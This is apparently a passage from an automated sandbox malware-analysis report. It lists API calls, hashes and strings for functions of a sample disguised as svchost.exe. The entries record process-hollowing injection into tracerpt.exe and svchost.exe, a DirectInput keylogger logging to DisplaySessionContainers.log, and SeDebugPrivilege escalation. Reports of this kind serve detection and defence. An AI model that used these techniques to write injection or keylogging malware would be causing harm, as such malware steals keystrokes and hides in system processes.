                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 04DF32CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID:
                                                                                                              • API String ID: 2809346765-0
                                                                                                              • Opcode ID: 17a846623e2814aae8611190eb2227084808a8205c4b752c15c7ac1e9ce49607
                                                                                                              • Instruction ID: 7d1e5b390589db9c95cf6a261dce9c6f9aabd0c25e42b5c9c93c54f8f13ce35e
                                                                                                              • Opcode Fuzzy Hash: 17a846623e2814aae8611190eb2227084808a8205c4b752c15c7ac1e9ce49607
                                                                                                              • Instruction Fuzzy Hash: 77118272B05204BBD7708AAEDC85B5E7798FB81364F134126EF18D7290D670FD419664
                                                                                                              Function 025830B0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SleepTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 346578373-0
                                                                                                              • Opcode ID: 9b4722b624e0aeb5785c219210b56b25ff3a11f242d146242766cdbd1158138f
                                                                                                              • Instruction ID: 04cb6d97dad0df52390441daf18c8dc7ae0c9fc3e99fca620176b8095868015a
                                                                                                              • Opcode Fuzzy Hash: 9b4722b624e0aeb5785c219210b56b25ff3a11f242d146242766cdbd1158138f
                                                                                                              • Instruction Fuzzy Hash: 2501D43160020ABFD311EF28C8C8BBDB7B5FB95704F144264D1049B280C7B0A9D5D7E5
                                                                                                              Function 04DF30E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SleepTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 346578373-0
                                                                                                              • Opcode ID: 61225528bd8b83cb80128722c838224b9b2978aabea083ae74d6e851398a9126
                                                                                                              • Instruction ID: 0cb47901ca0a85aa2bfa530e8710616b2810e0f3015987c6a36065b3be4c6628
                                                                                                              • Opcode Fuzzy Hash: 61225528bd8b83cb80128722c838224b9b2978aabea083ae74d6e851398a9126
                                                                                                              • Instruction Fuzzy Hash: E101F231200206AFD720CF69CCC8B69B7F5FB9A301F164224DA048B294C735BAC6C7E1
                                                                                                              Function 025864E0 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • HeapCreate.KERNELBASE(00000004,00000000,00000000,02586190,00000000,02585AF2), ref: 025864FB
                                                                                                              • _free.LIBCMT ref: 02586536
                                                                                                                • Part of subcall function 02581280: __CxxThrowException@8.LIBCMT ref: 02581290
                                                                                                                • Part of subcall function 02581280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,02597DF8,?,?,02586511), ref: 025812A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1116298128-0
                                                                                                              • Opcode ID: 4c416871c5f17d461c265f441a6c37e026a646eadac0d9651c3fe77f7bd077b8
                                                                                                              • Instruction ID: 5ef352f5398e0c6afbe7fd08f1e2d7eb76ad39d5bf4894f0b23242164d7bacc0
                                                                                                              • Opcode Fuzzy Hash: 4c416871c5f17d461c265f441a6c37e026a646eadac0d9651c3fe77f7bd077b8
                                                                                                              • Instruction Fuzzy Hash: F2017EF0A00B408FC3309F6AD844A17FAE9FF98710B504A1ED2DAD7A10D7B0A545CF59
                                                                                                              Function 04DFCD50 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • HeapCreate.KERNELBASE(00000004,00000000,00000000,04DFE09E,00000000,04DF9850,?,?,?,00000000,04E122BB,000000FF,?,04DFE09E), ref: 04DFCD6B
                                                                                                              • _free.LIBCMT ref: 04DFCDA6
                                                                                                                • Part of subcall function 04DF1280: __CxxThrowException@8.LIBCMT ref: 04DF1290
                                                                                                                • Part of subcall function 04DF1280: DeleteCriticalSection.KERNEL32(00000000,04DFD436,04E17644,?,?,04DFD436,?,?,?,?,04E161F4,00000000), ref: 04DF12A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1116298128-0
                                                                                                              • Opcode ID: a110f60fac92c5a6fc372aef022e3e77dc3a9d48f12fd31d9bc311615d64f809
                                                                                                              • Instruction ID: fd007dfe6b3c7768cbdf5ffe098cb749f60c39e91a7af05d9bdc5363e3fed450
                                                                                                              • Opcode Fuzzy Hash: a110f60fac92c5a6fc372aef022e3e77dc3a9d48f12fd31d9bc311615d64f809
                                                                                                              • Instruction Fuzzy Hash: B8017EF0A00B448FD7309F6A9844A07FAF8FF98711B118A1ED6DAC6A20D374A405CB95
                                                                                                              Function 04DFE4D0 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04DFDF60,00000000,00000000,00000000), ref: 04DFE4EB
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04E011B8,?,?,?,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04DFE4F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateObjectSingleThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1891408510-0
                                                                                                              • Opcode ID: 97d26294671fb86be8a7ba3450c0d88511e54c046371e9d340fa47980968facd
                                                                                                              • Instruction ID: 778475d0604b59e97b3d606ec58f137a58f27879bbca1687cff040247ffd30c8
                                                                                                              • Opcode Fuzzy Hash: 97d26294671fb86be8a7ba3450c0d88511e54c046371e9d340fa47980968facd
                                                                                                              • Instruction Fuzzy Hash: B4E05BB1544245BFEF309F55BC44D36B7DCE7047127104239BE20D32A8D539FD809A60
                                                                                                              Function 02587255 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02587261
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                                • Part of subcall function 02587236: __getptd_noexit.LIBCMT ref: 0258723B
                                                                                                                • Part of subcall function 02587236: __freeptd.LIBCMT ref: 02587245
                                                                                                                • Part of subcall function 02587236: ExitThread.KERNEL32 ref: 0258724E
                                                                                                              • __XcptFilter.LIBCMT ref: 02587282
                                                                                                                • Part of subcall function 02589CAD: __getptd_noexit.LIBCMT ref: 02589CB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                              • String ID:
                                                                                                              • API String ID: 418257734-0
                                                                                                              • Opcode ID: 0ea0c1c98fede5f0e375875cc1fc104bae23627d61ea555b37a360c674d81b9e
                                                                                                              • Instruction ID: 4c72d88306809e1276a88290ab68af2be203823da636619fb4a5c8a9621e1c9e
                                                                                                              • Opcode Fuzzy Hash: 0ea0c1c98fede5f0e375875cc1fc104bae23627d61ea555b37a360c674d81b9e
                                                                                                              • Instruction Fuzzy Hash: 48E0E6B5910605AFE718BBA0C945E7DB766FF88301F200049E103673A1DBB59941DF19
                                                                                                              Function 04DFF9D3 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04DFF9DF
                                                                                                                • Part of subcall function 04E03EAB: __getptd_noexit.LIBCMT ref: 04E03EAE
                                                                                                                • Part of subcall function 04E03EAB: __amsg_exit.LIBCMT ref: 04E03EBB
                                                                                                                • Part of subcall function 04DFF9B4: __getptd_noexit.LIBCMT ref: 04DFF9B9
                                                                                                                • Part of subcall function 04DFF9B4: __freeptd.LIBCMT ref: 04DFF9C3
                                                                                                                • Part of subcall function 04DFF9B4: ExitThread.KERNEL32 ref: 04DFF9CC
                                                                                                              • __XcptFilter.LIBCMT ref: 04DFFA00
                                                                                                                • Part of subcall function 04E041DD: __getptd_noexit.LIBCMT ref: 04E041E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                              • String ID:
                                                                                                              • API String ID: 418257734-0
                                                                                                              • Opcode ID: 52cf22b48670fbfcdee9c102af8bc388ac8017b73a5246b6d0237965a53dab2d
                                                                                                              • Instruction ID: 746a562ac93556499ddb0e982e2b5f7f1162049f3c056b19eb1447b7a7392578
                                                                                                              • Opcode Fuzzy Hash: 52cf22b48670fbfcdee9c102af8bc388ac8017b73a5246b6d0237965a53dab2d
                                                                                                              • Instruction Fuzzy Hash: 99E08CB1940600AFFB18FBA0C904E7D3734EF44208F205148E2115B2E0CA75B980EE20
                                                                                                              Function 04E06453 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 04E0646B
                                                                                                                • Part of subcall function 04E08EAB: __mtinitlocknum.LIBCMT ref: 04E08EC1
                                                                                                                • Part of subcall function 04E08EAB: __amsg_exit.LIBCMT ref: 04E08ECD
                                                                                                                • Part of subcall function 04E08EAB: EnterCriticalSection.KERNEL32(00000000,00000000,?,04E03F56,0000000D,04E17360,00000008,04E0404D,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?), ref: 04E08ED5
                                                                                                              • __tzset_nolock.LIBCMT ref: 04E0647C
                                                                                                                • Part of subcall function 04E05D72: __lock.LIBCMT ref: 04E05D94
                                                                                                                • Part of subcall function 04E05D72: ____lc_codepage_func.LIBCMT ref: 04E05DDB
                                                                                                                • Part of subcall function 04E05D72: __getenv_helper_nolock.LIBCMT ref: 04E05DFD
                                                                                                                • Part of subcall function 04E05D72: _free.LIBCMT ref: 04E05E34
                                                                                                                • Part of subcall function 04E05D72: _strlen.LIBCMT ref: 04E05E3B
                                                                                                                • Part of subcall function 04E05D72: __malloc_crt.LIBCMT ref: 04E05E42
                                                                                                                • Part of subcall function 04E05D72: _strlen.LIBCMT ref: 04E05E58
                                                                                                                • Part of subcall function 04E05D72: _strcpy_s.LIBCMT ref: 04E05E66
                                                                                                                • Part of subcall function 04E05D72: __invoke_watson.LIBCMT ref: 04E05E7B
                                                                                                                • Part of subcall function 04E05D72: _free.LIBCMT ref: 04E05E8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1828324828-0
                                                                                                              • Opcode ID: 2f382f1935b3b1d8cbb45089e2215bdb8e87dcfb3d36db19ac006c04ee7de1eb
                                                                                                              • Instruction ID: 719f9d80081964adf45c2ffbbe4cb8ac15d4c410309b6dd518c7281e035a6467
                                                                                                              • Opcode Fuzzy Hash: 2f382f1935b3b1d8cbb45089e2215bdb8e87dcfb3d36db19ac006c04ee7de1eb
                                                                                                              • Instruction Fuzzy Hash: A4E08CB1481710A7E732BBF0670061C7220BB90B2AF10F11AD23025CC8CA393AC2CA61
                                                                                                              Function 04DF6F0C Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCloseKey.ADVAPI32(80000001,04DF6EEA), ref: 04DF6F19
                                                                                                              • RegCloseKey.ADVAPI32(75A773E0), ref: 04DF6F22
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 2e38d0c5430f602f7855678a84d7e67cbc8354b586aeb9553d67d8ba19a7e3d8
                                                                                                              • Instruction ID: 5277e2798e736dd4470a861c358eddb5b8cecec91044bbcffba9f98582cf8091
                                                                                                              • Opcode Fuzzy Hash: 2e38d0c5430f602f7855678a84d7e67cbc8354b586aeb9553d67d8ba19a7e3d8
                                                                                                              • Instruction Fuzzy Hash: 82C09B72D0103857CF10EBA5FD4494DB7F89F4C210F1140C1A504B3114C634BD418F90
                                                                                                              Function 04DF5A80 Relevance: 2.7, APIs: 2, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c90ece5c0ba2427cde0549fc94bfdb169ec0db830469862bf0458b11d9d13d3d
                                                                                                              • Instruction ID: d5c5ef4eb8da5ce208b6ec41d43f0232dd359db08b573fcd24de191b59966a68
                                                                                                              • Opcode Fuzzy Hash: c90ece5c0ba2427cde0549fc94bfdb169ec0db830469862bf0458b11d9d13d3d
                                                                                                              • Instruction Fuzzy Hash: 47718F71A00209EFDB20DF58DC51BEEB7F5EF44310F5A8656EA16AB240E730BA44CB91
                                                                                                              Function 04E0A742 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,04E0459A,00000000,00000001,00000000,00000000,00000000,?,04E03E5D,00000001,00000214,?,04E04550), ref: 04E0A785
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 328603210-0
                                                                                                              • Opcode ID: df5ce02248586b08c0dabdb950e6d7759121a641e562858f914ca4ba0e34e341
                                                                                                              • Instruction ID: 36ceb8b0e692b10821ba3da20339ddaf6d29fd59dfe82c1c7d37d66696d7204e
                                                                                                              • Opcode Fuzzy Hash: df5ce02248586b08c0dabdb950e6d7759121a641e562858f914ca4ba0e34e341
                                                                                                              • Instruction Fuzzy Hash: F501843530131A9AEB249F25DC44B6B3764EF91769F19D639E835CB1D0EB74E8808790

                                                                                                              Non-executed Functions

                                                                                                              Function 02585820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 02585849
                                                                                                              • _memset.LIBCMT ref: 02585868
                                                                                                              • _memset.LIBCMT ref: 0258589D
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 025858B1
                                                                                                                • Part of subcall function 025859E0: _vswprintf_s.LIBCMT ref: 025859F1
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 025858E0
                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02585928
                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,75920630), ref: 0258594E
                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 02585968
                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 02585987
                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 025859A2
                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 025859C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                              • API String ID: 2170139861-1986163084
                                                                                                              • Opcode ID: f234fc2bf8c3a5602f9b2b1438758ff2831b487ea0a777584dacc2e89107dc5c
                                                                                                              • Instruction ID: 40e20b1f763819eef8e39c7583079db49b213f600ff42b8d8eca4d9ebbd41506
                                                                                                              • Opcode Fuzzy Hash: f234fc2bf8c3a5602f9b2b1438758ff2831b487ea0a777584dacc2e89107dc5c
                                                                                                              • Instruction Fuzzy Hash: 0D4185B0A40309AFEB25DF64DC45FAA77B8BF58700F40459DB64DA6180EAF09A94CF58
                                                                                                              Function 04DF7EA0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF7EC3
                                                                                                              • _memset.LIBCMT ref: 04DF7EEF
                                                                                                              • _memset.LIBCMT ref: 04DF7F24
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 04DF7F38
                                                                                                                • Part of subcall function 04DF8770: _vswprintf_s.LIBCMT ref: 04DF8781
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 04DF7F65
                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04DF7FB5
                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 04DF7FE2
                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 04DF7FFA
                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 04DF801C
                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 04DF803A
                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 04DF804F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                              • API String ID: 2170139861-2473635271
                                                                                                              • Opcode ID: d552b4205245e43f9ab2c97ef8ce909f41a614f1c6172c715f228a329af08398
                                                                                                              • Instruction ID: 2f862e58d13036191d4d50b1acc1e787cb3c41b09dff1bbe55e9ad4328bbdcc2
                                                                                                              • Opcode Fuzzy Hash: d552b4205245e43f9ab2c97ef8ce909f41a614f1c6172c715f228a329af08398
                                                                                                              • Instruction Fuzzy Hash: 054160B1A40218ABEB20DF65DC85FDEB7BCEF44705F0041D9A70DA6180DAB5AA84CF64
                                                                                                              Function 04DFE540 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,04E20D80,7591E010,75922FA0,75920F00,?,04DF6078,?,?), ref: 04DFE569
                                                                                                              • lstrcatW.KERNEL32(04E20D80,\DisplaySessionContainers.log,?,04DF6078,?,?), ref: 04DFE579
                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,04E20D80,?,04DF6078,?,?), ref: 04DFE588
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04DF6078,?,?), ref: 04DFE596
                                                                                                              • CreateFileW.KERNEL32(04E20D80,40000000,00000002,00000000,00000004,00000080,00000000,?,04DF6078,?,?), ref: 04DFE5B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,04DF6078,?,?), ref: 04DFE5BE
                                                                                                              • CloseHandle.KERNEL32(00000000,?,04DF6078,?,?), ref: 04DFE5C7
                                                                                                              • DeleteFileW.KERNEL32(04E20D80,?,04DF6078,?,?), ref: 04DFE5DA
                                                                                                              • ReleaseMutex.KERNEL32(?,?,04DF6078,?,?), ref: 04DFE5E7
                                                                                                              • DirectInput8Create.DINPUT8(?,00000800,04E15934,04E21220,00000000,?,04DF6078,?,?), ref: 04DFE602
                                                                                                              • GetTickCount.KERNEL32 ref: 04DFE6B5
                                                                                                              • GetKeyState.USER32(00000014), ref: 04DFE6C2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                              • String ID: <$\DisplaySessionContainers.log
                                                                                                              • API String ID: 1095970075-1170057892
                                                                                                              • Opcode ID: 6435d04db8628c4bbfc1c8f25ad16bdd4ed87b49f24211b2ad2601165bf09c15
                                                                                                              • Instruction ID: 1f4fb630a773db1b221e07ee9fc29bd6245a0b90c1836803180cabc40d66803c
                                                                                                              • Opcode Fuzzy Hash: 6435d04db8628c4bbfc1c8f25ad16bdd4ed87b49f24211b2ad2601165bf09c15
                                                                                                              • Instruction Fuzzy Hash: 8941EF71780219AFE720DFA6ED49F9A7BA4EB88702F104118FB05DB294C679B901CF54
                                                                                                              Function 04DF7670 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF7687
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF768E
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04DF76AA
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF76C7
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF76D1
                                                                                                              • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,04DFDFF4), ref: 04DF76E1
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04DF76E8
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04DF770A
                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 04DF7717
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                              • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                              • API String ID: 1802016953-1577477132
                                                                                                              • Opcode ID: 654f8862bf496be38b2edcf8d84e53cdb28782d1c7453618cebe20643036f675
                                                                                                              • Instruction ID: dc85cd6393377dcc804711e6d873495fce6fe57ef16bbf361eadf5a826f5c05c
                                                                                                              • Opcode Fuzzy Hash: 654f8862bf496be38b2edcf8d84e53cdb28782d1c7453618cebe20643036f675
                                                                                                              • Instruction Fuzzy Hash: E0217871B80209BBEB10DFE5DC0AFBE77B8EF08701F004559FB05A61D0CAB469448BA1
